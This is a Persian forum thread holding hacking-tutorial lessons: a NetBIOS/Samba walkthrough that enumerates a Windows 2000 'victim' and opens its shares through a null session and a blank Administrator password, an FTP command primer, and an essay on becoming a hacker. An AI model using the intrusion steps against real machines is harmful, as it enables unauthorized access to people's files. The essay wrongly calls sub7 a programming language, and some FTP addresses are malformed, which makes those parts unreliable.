خب ! همون طور که گفتم ما براي اين کاراز Samba استفاده ميکنيم. من اينجا چيزي در مورد Samba نمي‌نويسم و بناکار رو بر اين ميگذارم که تا حدودي ميتونيد با Samba کار کنيد . اگراحتمالا مشکلي داريد ميتونيد به Samba.org سر بزنيد و در Documention هادنبال راهنما باشيد Smile به طور کل اگر نميدونيد چطور از Samba استفاده کنيدبهتره که کاري با کامپيوتر هاي مردم نداشته باشيد ! Smile


- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱-اولين قدم پيدا کردن کامپيوتريه که پرت 139 و 137 که پرت Netbios هست روباز کرده باشه. براي اينکار از Nmap استفاده مي‌کنيم. Nmap معمولا رو همهDescription هاي فعلي پيدا ميشه. مي‌خوام به کمک Nmap تست کنم که از ipشماره 192.168.3.50 تا 192.168.3.1 کدام‌ها پورت ۱۳۹ باز دارند. براي اينکار مي‌نويسم:
# nmap -sS -O 192.168.3.1-50 -p 139
و جواب مي‌شنوم:
st 1 open and 1 closed TCP port
Interesting ports on (192.168.3.2):
Port State Service
139/tcp open netbios-ssn
Remote OS guesses: Windows Millennium Edition (Me), Win 2000,
or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3
بايداينو بهتون بگم که من دارم اين کار رو روي Lan انجام ميدم و همه Ip هاStatic هستند. ولي خب کار رو جوري در نظر ميگيرم که گويا نميدونم چه Hostهاي اينجا وجود دارن Smile 192.168.3.1 يک SuSE 8 هست که کار رو از طريقشانجام ميديم و 192.168.3.2 يک win2kpro sp2 هست که قربانيه و البتهFireWall نداره Smile من اينجا از آيپي هاي کلاس C استفاده ميکنم ممکنه وضعشما تو اينترنت فرق کنه، ولي خب نحوه کار تغيير نميکنه. حالا هدف رو پيداکرديم، هدف ما 192.168.3.2 هست .

۲- قدم دوم گرفتن NetbiosNameهاي هدفه. بدون اين اسمها ما نميتونيم هيچ جور اطلاعاتي از هدف بگيريم. ازاونجايي که مايکروسافت سعي کرده همه کارها رو ساده کنه، ويندوز هاي روشبکه Netbios به جاي Ip Address از اسم استفاده ميکنن!! خب اينجا لازمه ازيه Netbios Scanner يا Share Scanner استفاده کنيم. معمولا رو هرDescription يي دستور nmblookup پيدا ميشه - که خيلي شبيه nbtstat ويندوزه- رو لينوکس کار ميکنه. من شخصا خيلي از nmblookup خوشم نمياد چون ShareScanner هاي بسيار بهتري هستن ! Smile به هر صورت من اينجا از nmblookupاستفاده ميکنم . شکل کلي دستور اينه : nmblookup –A . اين flag ه A باعث ميشه که nmblookup بتونه Query بهتري انجام بده . حالا رو هدفهوم امتحان ميکنيم :
# nmblookup –A 192.168.3.2
و جواب مي‌گيرم:
Looking up status of 192.168.3.2
ARMINLAPTOP <00> - B < ACTIVE>
WORKGROUP <00> - < GROUP> B < ACTIVE>
ARMINLAPTOP <03> - B < ACTIVE>
ARMINLAPTOP <20> - B < ACTIVE>
WORKGROUP <1e> - < GROUP> B < ACTIVE>
ADMINISTRATOR <03> - B < ACTIVE>
WORKGROUP <1d> - B < ACTIVE>
..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>
همه چيز مشخصه نه ؟ اسم کامپيوتر ARMINLAPTOP , گروه کامپيوتر WORKGROUP و کاربر فعال Administrator هست Smile

۳-بگذارين قبل از قسمت سوم کار يکمي در مورد ويندوز ها صحبت کنيم. Netbiosبه طور کلي روي همه ويندوز ها به نوعي خطر ايجاد ميکنه. رو ويندوز هاي سري2000 به بالا همه پارتيشن هاي سيستم Share شده اند و با پسوردي کهAdministrator دارد، باز ميشن. خيلي از کاربران تازه کار هم پسوردAdministrator رو خالي ميگذارن. به نظر من اين سري ويندوز ها بيشتر در خطرهستند. رو ويندوز هاي 9x هيچ فايلي به طور Default Share نشده، ولي خوباگر بشه ممکنه بتونيم از طريقش بدون پسورد وارد فايل سيستم بشيم Smile حتياگر پسورد Administrator رو هم نداشته باشيم Anonymous Login ميتونهاطلاعات خيلي مفيدي بهموم بده Smile حالا مي‌خواهيم ليست Share ها رو بدستبياوريم . ( در درس قبلي براي ويندوز از دستور net view براي همين‌کاراستفاده کرديم) توجه کنيد که کرنل بايد Network File System و Samba FileSystem رو ساپرت کرده باشه : در اين مثال در نظر گرفتم که پسوردAdministrator خاليه ! Smile مي‌نويسم:
# smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2
نتيجه دستور به صورت زير است:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
ADMIN$ Disk Remote Admin
C$ Disk Default share
Armin Disk

Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP

Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خبميبينيد ؟ Smile هر دو پارتيشن ARMINLAPTOP در اختيار شماست ! Smile همچنينکامپيوتر هايي که باهاش در ارتباط هستند رو هم ميبينيم. در اين مثالملاحظه مي‌فرماييد که Armin به عنوان Disk به‌اشتراک گذاشته شده. خب قبلاز اينکه بريم سراغ بقيه کار يک بار هم Anonymous رو امتحان ميکنيم ( يهچيزي مثل Null Session ):
# smbclient -LARMINLAPTOP -I 192.168.3.2
و جواب:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED

Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP

Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خبباز هم يه اطلاعاتي پيدا ميکنيم ! Smile با اينکه فايلهاي Share شده رونميبينيم، به هر صورت از هيچي بهتره ! شايد يه جاي ديگه به درد بخوره !

۴- خب حالا سعي ميکنيم که اين Share هارو Mount کنيم. مي‌نويسيم:
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2
و جواب مي‌شنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
session setup failed: NT_STATUS_LOGON_FAILURE
خب! Smile Share توسط Password محافظت ميشه ! Smile کار زيادي نمي‌تونيم انجامبديم. مثلا مي‌تونيم همين Null پسورد رو امتحان کنم، ولي خب اگر با Win9xطرف باشيم کاري نميشه کرد . حالا رو ويندوز 2000 به بالا کار مي‌کنيم. روياينکه کاربر ناشي باشه و پسورد Administrator رو خالي گذاشته باشه خيليحساب کرديم :
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator
و جواب مي‌شنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>
اين
smb: \> ls
و جواب مي‌شنوم:
. DA 0 Sat Feb 8 05:34:11 2003
.. DA 0 Sat Feb 8 05:34:11 2003
Blcorp D 0 Sat Feb 8 03:05:51 2003

47943 blocks of size 65536. 8261 blocks available
و ادامه مي‌دم به صورت زير:
smb: \> cd Blcorp
smb: \Blcorp\> ls
. D 0 Sat Feb 8 03:05:51 2003
.. D 0 Sat Feb 8 03:05:51 2003
WLTrial.exe A 2321412 Mon Apr 29 14:18:58 2002

47943 blocks of size 65536. 8261 blocks available
smb: \Blcorp\> get WLTrial.exe
getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...
smb: \Blcorp\>
شماميتونيد از دستور Pull براي فرستادن فايل و get براي گرفتن فايل استفادهکنيد Smile فايلها گرفته شده در دايرکتوري فعلي شما ذخيره ميشوند . قسمتاميدوار کننده کار اينه که خيلي از مردم از ويندوز استفاده ميکنن واکثرشون حتي نميدونن که همه فايل سيستم هاشون بدون پسورد به راحتي قابلدسترسه. خب ما هم اينهارو ياد نمي‌گيريم که دور دنيا بچرخيم و فايلهايمردم رو پاک کنيم !


- FAQ

- آيا Samba به نا امني Netbios ويندوز است ؟
نهاصلا ! Samba يک برنامه پرقدرته , اگر خوب Config شه احتمال هک شدنش بسيارپايينه ! فرض کنيد از طريق سيستم‌عامل ويندوز مي‌خوام اين کامپيوتري کهSamba داره رو هک کنم. دستور تايپ شده و جواب بدست اومده بيانگر امنيتSamba ست:
C:\>nbtstat -A 192.168.3.1

Local Area Connection 2:
Node IpAddress: [192.168.3.2] Scope Id: []

Host not found
- يک نفوذ بدون مشکل جدي چقدر طول مي‌کشه ؟
موقع هک کردن Client بايد سريع باشيد ! کل اين مراحل حداکثر 3 يا 4 دقيقه وقت ميگيره , فقط نوشتنش طول ميکشه! Smile

- چرا هک کردن Netbios از طريق Unix/Linux راحت تر از Windows هست ؟
خب خيلي سريع تره، ابزارهاي بهتر و از همه مهم‌تر اينکه خودتون در معرض خطر نيستيد

uody
22nd February 2011, 02:56 PM
و اینم قسمت پایانی برای تمامی عزیزانی که تا به حال این موضوع رو دنبال میکردن

آموزش قدم به قدم هک قسمت 19 (پایانی) وضوع:پورت21


- يه نکته راجع به اين درس

دلممي‌خواست که براي اين درس فقط چند تا لينک معرفي کنم که خودتون بريد و درسftp رو از همون‌ لينک‌ها ياد بگيرين. دليلش هم کاملا واضحه! علتش اينه کهدر مورد اين درس خاص اين‌قدر مقاله کامل تو اينترنت هست که اگه يه سال همبشينين هر روز بخونيدشون، تموم نميشه. ولي به هر حال به خاطر اينکه قرارشده تمام مطالب مرتبط با هک رو گام به گام همين‌جا براتون توضيح بدم، ايندرس تابلو! رو هم مي‌گم. ولي ازتون مي‌خوام که حتما يک search بکنين ومقاله‌هاي مختلف راجع به اين درس رو خودتون هم مطالعه کنيد. ياد گرفتن ftpاز نون شب هم واجب‌تره http://www.vispar.ir/forum/images/smilies/smile.gif


- پورت ۲۱ چيست؟

پورت۲۱ رو پورت ftp مي‌گن. ftp مخفف عبارت file transfer protocol است يعنيپروتکل انتقال فايل. کاربرد اين پروتکل و اين پورت از زماني وجود داره کهحتي وب (پورت ۸۰ ) هم چندان عمومي نشده بود. پس مي‌تونم بگم که يه پروتکلباستاني هستش. وقتي مي‌خواهيد با يک سرور از طريق اين پروتکل صحبت کنيد،بايد مطمئن بشين که سرويس مربوط به ftp روي اون کامپيوتر فعال باشه. بهعبارت ديگه بايد يک ftp server روي اون کامپيوتر در حال اجرا باشه. حالاشما با اون کامپيوتر مي‌خواين ارتباط برقرار کنين، پس شما بايد از يک ftpclient استفاده کنيد. پس شما کلاينت هستيد و دستگاه مقابل سرور!
حالا شايد بپرسين که کار ftp چيست؟

عبارتديگه‌اي که راجع به اين پورت بايد ياد بگيريد، عبارت anonymous است. برايتوضيح اين عبارت اول بايد بگم که وقتي شما مي‌خواهيد با سرور ارتباطبرقرار کنيد، همين‌طوري کشکي که نيس! براي ارتباط با سرور از شما usernameو password پرسيده مي‌شه و اگه درست باشه مي‌تونين فايل‌ها رو upload وdownload کنيد و تغيير بديد ( پس مي‌بينيد که اين پروتکل پروتکل حساسي استو اگه هک بشه خيلي کارها ميشه باهاش کرد). اين حالت که گفتم در حالتيممکنه که شما username و password داشته باشيد. اما گاهي پيش مي‌آد کهusername و password نداريم و مي‌خوايم با پورت ftp يک سرور يا سايتارتباط برقرار کنيم. در اين حالت معمولا فقط اجازه download به ما دادهميشه و اجازه upload و يا اعمال تغييرات در فايل‌ها رو نداريم و اونو حالتanonymous يا ناشناس مي‌گن. در اين حالت وقتي از ما username خواسته ميشه،عبارت anonymous را تايپ مي‌کنيم و بعد که پسورد پرسيده ميشه، شما بايدE-mail تون رو وارد کنيد، ولي من مي‌گم که به جاي E-mail واقعي تون يهE-mail الکي بنويسين مثلا alaki@dolaki.com !!
آدرسي که براي ftp با يه سرور استفاده مي‌کنيم به چه شکلي است؟
آدرسيکه استفاده مي‌کنيم بستگي به سرور داره ولي معمولا ساختار ثابتي داره. (اگه يادتون باشه واسه web مثلا مي‌نوشتيم، http://www.far30.com (http://www.far30.com/) ) حالا براي ftpمي‌نويسيم، http://ftp.far30.com (http://ftp.far30.com/) پس مثلا براي سايت sazin.com مي‌نويسيم،ftp.sazin.com که آدرس ftp سايت ميشه.
ftpبراي انتقال فايل به کار ميره و اين انتقال فايل در دو جهت ممکنه کهupload و download گفته ميشه. براي اينکه اين‌ها رو قاطي نکنيد با هم فرضکنيد که کامپيوتر سرور بالای سر شما قرار گرفته، پس وقتي فايل رو از اونمي‌گيريد، فايل به سمت پايين مي‌آد (download) و وقتي فايل رو براي سرورمي‌فرستيد، حالت برعکس مي‌باشد و بهش مي‌گيم، upload کردن. و هر دو عبارتنوعي انتقال فايل محسوب ميشه. دقت کنيد که انتقال فايل از طريق پروتکل‌هايديگه‌اي هم امکان‌پذيره مثل web و ... ولي ما بحث‌مون همين پروتکل ftp است.

- چطوري يه سرور پيدا کنم که سرويس ftp روي اون فعال باشه؟

اين سوال دو حالت داره:
http://ftp.microsoft.com (http://ftp.microsoft.com/) استفاده کنيد يا سايت‌هاي ديگه.
http://ftp.geocities.com (http://ftp.geocities.com/) يا http://ftp.netfirms.com (http://ftp.netfirms.com/) و... خواهدبود. (از من نخواين که طريقه ثبت‌نام در اين سايت‌ها رو هم به شما يادبدم! کار خيلي راحتيه.)
۱-مي‌خواهيد به صورت anonymous وارد بشين يعني username و password ندارين.براي اين حالت مي‌تونين از خيلي از سايت‌ها استفاده کنيد. مثلا مي‌تونيناز ۲- اگه مي‌خوايدبه صورت غير anonymous کار کنيد، حيطه عمل‌تون محدود به سايت‌هايي ميشه کهusername و password واسه اون دارين. مثلا اگه شما سايتي روي اينترنتداشته باشيد ( چه سايت پولي و چه سايت مجاني مثلا در netfirms و geocitiesو ... ) به شما يک آدرس ftp و يک username و password تعلق مي‌گيره که ازطريق اون کار مي‌کنيد. اگه سايت نداريد، مي‌تونيد يک سايت مجاني درستکنيد. مثلا مي‌تونيد از سايت geocities.com که متعلق به ياهو است استفادهکنيد. يا از سايت‌های netfirms.com يا freeservers.com و... ولي به‌هر حالدر يکي از اين‌ها ثبت‌نام کنيد و username و password بگيريد. آدرس‌هايftp آنها هم که به‌صورت

- با پورت ۲۱ صحبت کنيم

فرضکنيد من از يک سايت فرضي استفاده مي‌کنم که آدرس ftp اون باشه:ftp.somesite.com و username من باشه ali1000 و پسوردم هم يه چيزه ديگهباشه. حالا مي‌خوام از طريق پورت ۲۱ با اين سايت ارتباط برقرار کنم. درمورد اين پورت ديگه از nc و telnet استفاده نمي‌کنم، بلکه از برنامه‌اي کهدر تمام ويندوز‌ها هست، به اسم ftp کمک مي‌گيرم. در command promptمي‌نويسم:
ftp http://ftp.somesite.com (http://ftp.somesite.com/)
و جواب مي‌شنوم:

220 somesite Microsoft FTP Service (Version 5.0).
User (somesite.com:(none)):
دقتکنيد که اين سايت ftp server اش از نوع Microsoft است، پس اين سرور ازسيستم‌عامل ويندوز استفاده مي‌کنه ( دونستن اين نکات لازم نيست، ولي منتوصيه مي‌کنم که هميشه به جزئيات توجه کنيد) دقت کنيد که از من usernameرو مي‌خواد، پس مي‌نويسم: ali1000 و Enter رو فشار مي‌دم. جواب مي‌آد:

Password:
حالا ازم پسورد مي‌خواد و پسورد رو تايپ مي‌کنم. جواب مي‌شنوم:

ftp>
ايننشون ميده که تونستم با پورت ۲۱ کامپيوتر مقابل ارتباط برقرار کرده واصطلاحا يک session يا نشست! باهاش داشته باشم. اگه username يا passwordاشتباه بود، اون موقع مي‌گفت:

Login failed.
ftp>
من فرض مي‌کنم که session با موفقيت برقرار شده، حالا تايپ مي‌کنم:
help
و جواب مي‌شنوم:

Connected to somesite.com. 331 Password required for ali1000. 230 User ali1000 logged in. 530 User ali1000 cannot log in. ftp> Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
اين‌هاليست دستوراتي است که مي‌تونيد استفاده کنيد. من فقط اون‌هايي که به صورتbold مشخص کردم رو توضيح خواهم داد. بقيه دستورات کمتر به کار مي‌رن.


- دستورات پايه براي اين پورت کدامند؟

+ دستور help و ?
دستور help رو همين الان استفاده کرديم. دستور ? هم معادل اونه.

+ دستور dir و ls
اين دو دستور نشون مي‌دن که در محل فعلي در سرورچه فايل‌ها و فولدر (دايرکتوری) هايي وجود دارد. فرق‌شون اينه که وقتي ازdir استفاده مي‌کنيد، اطلاعات بيشتري علاوه بر نام فايل‌ها و فولدر‌ها بهما ميده. من نوشتم dir و جواب شنيدم:

150 Opening ASCII mode data connection for /bin/ls.
12-28-02 02:18AM < DIR> db
12-28-02 02:19AM < DIR> Special
03-08-03 03:18AM < DIR> www
226 Transfer complete.
ftp: 135 bytes received in 0.02Seconds 6.75Kbytes/sec.
ملاحظهمي‌فرماييد که سه تا فولدر (دايرکتوري) اينجا هست. (اگه با دستور dir آشنانيستيد، يک کتاب داس بخونيد). اين‌ها فولدر هستند چون عبارت < DIR>جلوي اون‌ها نوشته شده است. نام اين فولدرها عبارتند از db و special و www
200 PORT command successful.
+ دستورات مرتبط با کار روي فولدرهايي که روي سرور (نه روي کامپيوتر خودمون) هستند، عبارنتد از:
cd يا chdir ==> اين دستور براي وارد شدن داخل يک فولدر به کار مي‌ره.
mkdir ==> اين دستور براي ساختن يک فولدر جديد به کار ميره.
rmdir ==> اين دستور براي پاک کردن يک فولدر موجود به کار ميره (به شرطي که آن فولدر خالي باشد)
برايکار با هر کدوم از اين دستورات کافي است، دستور مورد نظر را نوشته و بعداز يک کاراکتر فاصله، نام فولدر را بنويسيد، مثلا اگه بخوام وارد فولدرwww بشم، مي‌نويسم:
cd www
و جواب مي‌شنوم:

ftp>
اين جواب به آن معني است که وارد فولدر (دايرکتوري) www شده‌ام. حالا دوباره دستور dir را استفاده مي‌کنم و جواب مي‌گيرم:

150 Opening ASCII mode data connection for /bin/ls.
12-28-02 02:18AM < DIR> _private
02-17-03 04:15PM 61982 1.jpg
12-28-02 02:19AM < DIR> aspnet_client
12-28-02 02:19AM < DIR> cgi-bin
12-29-02 06:27PM 11285 default.asp
12-28-02 02:19AM < DIR> images
12-28-02 02:18AM 2494 postinfo.html
226 Transfer complete.
ftp: 1438 bytes received in 0.28Seconds 5.12Kbytes/sec.
ftp>
ملاحظهمي‌کنيد که سه‌ تا فايل و سه تا دايرکتوري داريم. اون‌هايي که جلوشوننوشته < DIR> دايرکتوري هستند و اونايي که اين عبارت رو ندارند وجلوشون يه عدد نوشته شده ( که بيانگر حجم هر کدومشون هست ) فايل مي‌باشند.
در مورد دستور cd اگه بنويسم .. cdبه فولدر قبلي بر مي‌گرديم، مثلا الان که تو فولدر www هستيم اگه .. cd روبنويسم، يک فولدر به عقب برمي‌گردم ( به حالت قبل از ورود به www )
يه دستور ديگه هم راجع به فولدرها هست و اونم دستور pwd است. اين دستور نشون ميده که ما الان تو کدوم فولدر از فولدرهاي سرور هستيم.
250 CWD command successful. 200 PORT command successful.
+ دستورات مرتبط با فايل‌ها عبارنتد از:
delete يا dele ==> اين دستور براي پاک کردن يک فايل به کار مي‌ره.
rename ==> اين دستور براي عوض کردن نام يک فايل به کار مي‌ره.
مثلا اگه بخوام فايل default.asp رو پاک کنم، مي‌نويسم delete default.asp
اگه بخوام فايل default.asp رو به index.htm تغيير نام بدم، مي‌نويسم rename default.asp index.htm

+ دستورات مرتبط با فولدرهاي کامپيوتر خودمان:
اولدقت کنيد که در مورد پورت ۲۱ وقتي مي‌گوييم در کدام فولدر قرار داريم، اينمسئله دو معني داره. حالت اول محل فعلي ما روی سرور است. يعني کجاي سرورهستيم. تمام دستوراتي که راجع به فولدرها گفتم براي کار روي فولدرهاي سروراست. حالت دوم محل فعلي ما در کامپيوتر خودمون است. فرض کنيد که واردفولدري در کامپيوتر سرور شده‌ايم والان مي‌خوايم فايل را داون‌لود کنيم بهکامپيوتر خودمون. براي اينکه فايل به فولدر درستي در کامپيوتر خودمونمنتقل بشه، بايد وارد يک فولدر خاص در کامپيوترمان بشيم. دستور مرتبط بااون دستور lcdاست. مثلا اگه بخوام وارد فولدر araz از درايو :C بشم، مي‌نويسم:
lcd c:/araz



- دستورات اصلي (upload و download فايل) کدامند؟

قبل از اينکه اين دستورات رو بگم، انواع فايل رو بگم:
==> فايل‌هاي ascii : فايل‌هايي که حالت متني دارند، مثل فايل‌هاي txt و html و asp و php و rtf و ...
==> فايل‌هاي binary : فايل‌هايي که متني نيستند، مثل فايل‌هاي گرافيکي، مولتي‌مديا، database ، doc و ...

وقتي مي‌خواهيم فايل رو داون‌لود يا upload کنيم، بايد قبل از انتقال فايل نوع اون رو تنظيم کنيم. دو تا دستور براي اين‌کار داريم:
+ دستور ascii يا asc : يعني مي‌خواهيم به صورت اسکي عمل انتقال انجام شود.
+ دستور binary يا bin : يعني مي‌خواهيم به صورت باينري عمل انتقال انجام شود.

+دستور prompt:وقتي تعداد زيادي فايل رو قرار باشه منتقل کنيم، و از دستور مربوط بهupload يا download استفاده مي‌کنيم، هر بار که فايلي مي‌خواهد منتقل شود،از ما سوال مي‌کند که آيا مي‌خواهيد اين فايل منتقل شود يا نه. فرض کنيدکه مي‌خواهيد مثلا ۱۰۰ فايل رو منتقل کنيد، در اين موارد ۱۰۰ بار از شمااين سوال پرسيده مي‌شود. براي اين‌که اين حالت رو غير فعال کنيم،مي‌نويسيم prompt تا غيرفعال شود، اگه يه بار ديگه همين دستور رو بنويسيم،دوباره فعال ميشه و قس‌علي‌هذا !

+ دستورهاي مربوط به upload فايل:
دستور put:اين دستور يک فايل رو از کامپيوتر ما به سرور منتقل مي‌کنه (از فولدر فعليکامپيوتر ما به فولدر فعلي کامپيوتر سرور). مثلا اگه بخوام فايلي به اسمali.jpg رو upload کنم، اگه در حالت ascii باشم، اول بايد به حالت binaryتغيير حالت بدم و بعد بنويسم:
put ali.jpg
و جواب مي‌شنوم:

150 Opening BINARY mode data connection for ali.jpg.
226 Transfer complete.
ftp: 21010 bytes sent in 0.02Seconds 1050.50Kbytes/sec.
ftp>
دستور mput:اين دستور چند فايل رو upload مي‌کند، مثلا اگه بخوام همه فايل‌هاي htm کهاسمشون با کاراکتر s شروع ميشه رو منتقل کنم، مي‌تويسم (البته بايد قبلشبه حالت ascii تغيير حالت داده باشم):
200 PORT command successful. mput s*.htm
+ دستورهاي مربوط به download فايل:
دستور get:اين دستور يک فايل رو از سرور به کامپيوتر ما منتقل مي‌کنه (از فولدر فعليسرور ما به فولدر فعلي کامپيوتر ما). مثلا اگه بخوام فايلي به اسمdefault.asp رو download کنم، مي‌نويسم:
get default.asp
دستور mget:اين دستور چند فايل رو download مي‌کند، مثلا اگه بخوام همه فايل‌هاي htmکه اسمشون با کاراکتر s شروع ميشه رو منتقل کنم، مي‌تويسم:
mget s*.htm


- چگونه کار را خاتمه دهيم؟

+ اول بايد session را خاتمه دهيم. براي اين‌کار مي‌تونيد از يکي از دو دستور close يا disconnect استفاده کنيم.
+ بعد، براي خروج از ftp بايد از يکي از دو دستور quit يا bye استفاده کنيم.


- حالت anonymous چه فرقي با حالت بالا دارد؟

هيچ‌فرقي در روش کانکت شدن، ندارد. تنها فرق در username و password است که بهترتيب، anonymous و e-mail رو استفاده مي‌کنيم. و نيز همون‌طور که قبلاگقتم بعد از کانکشن به صورت anonymous اجازه upload يا اعمال تغييرات رويserver رو نداريم.


- چه نرم‌افزارهاي گرافيکي براي کار کار با ftp وجود دارد؟

نرم‌افزارهايگرافيکي زيادي براي اين‌کار وجود دارند، مثل fetch براي کامپيوترهايMacintosh و نرم‌افزارهاي WS_FTP و CuteFtp و WinFTP و... براي ويندوز کههيچ‌کدوم مفت نمي‌ارزند!!


- راحت‌ترين روش کار با اين پورت به نظر شما چيست؟

راحت‌ترينروش ممکن، استفاده از web browser کامپيوترتون مثل internet explorer است!در اين حالت دقيقا مثل اين است که داريد با فولدرهاي کامپيوتر خودتون کارمي کنيد. مي‌تونيد براي download فايل رو فايل مورد نظر دابل‌کليک کنيد وبراي upload مي‌تونيد فايل رو از بيرون به مرورگر drag & drop يا copy& paste کنيد!
+ اگه بخواين به صورت anonymous مثلا به سايت microsoft وارد شويد، کافي است در مرورگر بنويسيد: ftp://ftp.microsoft.com و Enter را فشار دهيد.
+اگه بخواين به صورت غير anonymous مثلا به سايت http://ftp.somesite.com (http://ftp.somesite.com/) کهusername شما براي آن سايت ali1000 است وارد شويد، در مرورگر مي‌نويسيد: ftp://ali1000@ftp.microsoft.comو Enter را فشار مي‌دهيد. در اين حالت، پنجره‌اي باز شده و از شما پسوردمي‌خواهد و شما پسورد را نوشته و بعد از تاييد، وارد پورت ۲۱ اون کامپيوترمي‌شين.

uody
6th March 2011, 12:23 AM
چگونه هکر حرفه ای شویم؟
برای شروع چه چیزی لازم است؟

۱-Linuxوwinرا روی کامپیوتر نصب کنید و شروع به یادگیری کنید.

۲-شروع به یارگیری زبان C کنید.

۳-شروع به یاد گیری… TCP/IPکنید.

۴-مهمترین چیز علاقه به طی کردن یک راه بسیار طولانی.

برای یاد گرفتن هر یک از موارد فوق بهترین راه استفاده از کتاب و همچنین استفاده از تجربیات دیگران میباشد امروزه میتوان در بازار کتاب های متنوعی را پیدا کرد و با مطالعه ی آنها به سطح قابل قبولی از اطلاعات رسید.گفته میشود کسانی میتوانند در این راه موفق شوند که کل وقت انها(full time) آنها صرف کار با کامپیوتر میشوداما نظر من متفاوت است و اگر کسی علاقمند به این کار باشد میتواند با تلاش بیشتر به هدفش برسد.

در هر کاری شرط اصلی داشتن اراده ی قوی است,شرایط دیگر چندان اهمیتی ندارد.(گوته)

در پس هر موفقیت به ظاهر یک شبه بیست سال تلاش و زحمت وجود داشته است.(ماکسول-مالتز)

بنابرای شما نباید انتظار داشته باشید امروز که یادگیری رو شروع کردین فردا بتونین ساب دومین یاهو رو بزنین,به گفته ی آنتونی رابینز”راه موفقیت همیشه در دست ساختمان است,موفقیت پیش رفتن است نه به نقطه پایان رسیدن”

شما فکر میکند هدف یک هکر چیست؟

هدف یک هکر وارد شدن و نفوذ کردن به یک سیستم است اما نه بخاطر خرابکاری و بدست آوردن اطلاعات آن سیستم بلکه او قصد دارد تا با این کار نشان دهد که سیستم مورد نظر از لحاظ ایمنی ایراد دارد و وظیفه ی مدیر سیستم آن است که ان را اصلاح کند. فراموش نکنیم که بهترین مدیر سیستم همان بهترین هکر است این جمله را با زدن این مثال که بهترین پلیس بهترین دزد میباشد مقایسه کرد و هکری که مدیر سیستم است اغلب یک برنامه نویس حرفه ای و یک طراح وب میباشد,این دسته از هکرها با وارد شدن به سیستم نشان میدهند که سیستم ایراد دارد و سپس با ارائه راه حل امنیتی عیب سیستم مورد نظر را بر طرف میکنند و از این طریق میتوانند سود اقتصادی هم بدست آورند.این دسته از هکرها معمولا به هکرهای کلاه سفید معروف هستند.

اما دسته ی دوم هکرها,این گروه از هکرها قصدشان ورود به سیستم,خرابکاری,دست یابی به اطلاعات شخصی دیگران,بدست آوردن رمز عبور دیگران و مشهور شدن با استفاده از این راه میباشد این گروه از هکرها که به کراکر معروف میباشند مورد نفرت هکرهای کلاه سفید قرار دارند.

اگر شما دوست دارید که یک هکر حرفه ای(البته از نوع کلاه سفید) شوید مقاله ی زیر را تا پایان بخوانید در این مقاله به چیزهای که یک هکر حرفه ای باید داشته باشد اشاره شده است,میتوان گفت این موارد از ملزومات هکر شدن میباشد و دانستن آنها واجب میباشد.

آدمی ساخته ی افکار خویش است فردا همان خواهد شد که امروز فکر میکند.(مترلینگ)

چهار اصلی که شما باید آنها را بلد باشید.

۱)بیاموزید چگونه برنامه نویسی کنید.

-اگر شما هیچ زبان برنامه نویسی بلد نیستید پیشنهاد میکنم از پیتون شروع کنید.

-جاوا انتخاب فوق العاده ای برای زبان دوم میباشد.

-نرم افزار sub7 برای افراد مبتدی خوب است.اما نباید در مورد این زبان برنامه نویسی زیاده روی کرد.

-اگر بصورت جدی به برنامه نویسی روی آورده اید باید زبان پایه ای unix رایاد بگیرید.c++ بسیار شبیه c است اگر شما یکی از آنها را یاد بگیرید یاد گرفتن دیگری مشکل نخواهد بود.

-برای آنکه یک هکر واقعی شوید باید به جائی برسید که بتوانید یک زبان جدید را در دو یا سه روز یاد بگیرید این نیازمند آن است که چندید زبان کاملا متفاوت را یاد بگیرید.البته بعضی از زبانهای برنامه نویسی

شبیه هم میباشند و اگر یکی را بلد باشید یادگری دومی چندان مشکل نخواهد بود.

-بطور کلی هر زبانی که تحت لینوکی یا یکی از نسخه های bsd پشتیبانی نگردد و یا حداقل توسط سه شرکت مختلف پشتیبانی نگردد ارزش این را ندارد که برای هک کردن آنرا یاد بگیرید.

بعضی از زبانها هستند که برای هکرها ارزش خاصی دارند:

)perl:به این دلیل ارزش دارد که کاربردی است و بطور گسترده در طراحی صفحات وب و مدیریت سیستم و شبکه به کار گرفته شده است.

b)lisp:لیسپ هم به دلایل دیگری ارزشمند است حتی اگر هیچگاه از لیسپ بطور جدی استفاده نکنید.

نکته مهم:حقیقتا بهتر است هر نوع پنج زبان(پیتون,جاوا,C++,C,lisp) را یاد بگیرید,جدا از ارزشی که این زبانها برای هکرها دارند,آنان رویکرد کاملا متفاوتی برای برنامه نویسی دارند که مسائل با ارزش و شفافی به شما میدهند.همچنین زبانhtmlجز ملزومات اولیه هکر شدن میباشد که یک هکر باید آنرا بلد باشد.

۲)یکی از یونیکس های باز متن را یاد بگیرید و استفاده و اجرا کردن آن را بیاموزید.

-مهمترین قدم اولیه هر مبتدی برای هکرشدن میتواند بردارد,گرفتن یک کپی ازلینوکس(linux) یا بی اس دی یونیکس(bsd-unix) و نصب کردن ان روی کامپیوتر شخصی و اجرا ان است.

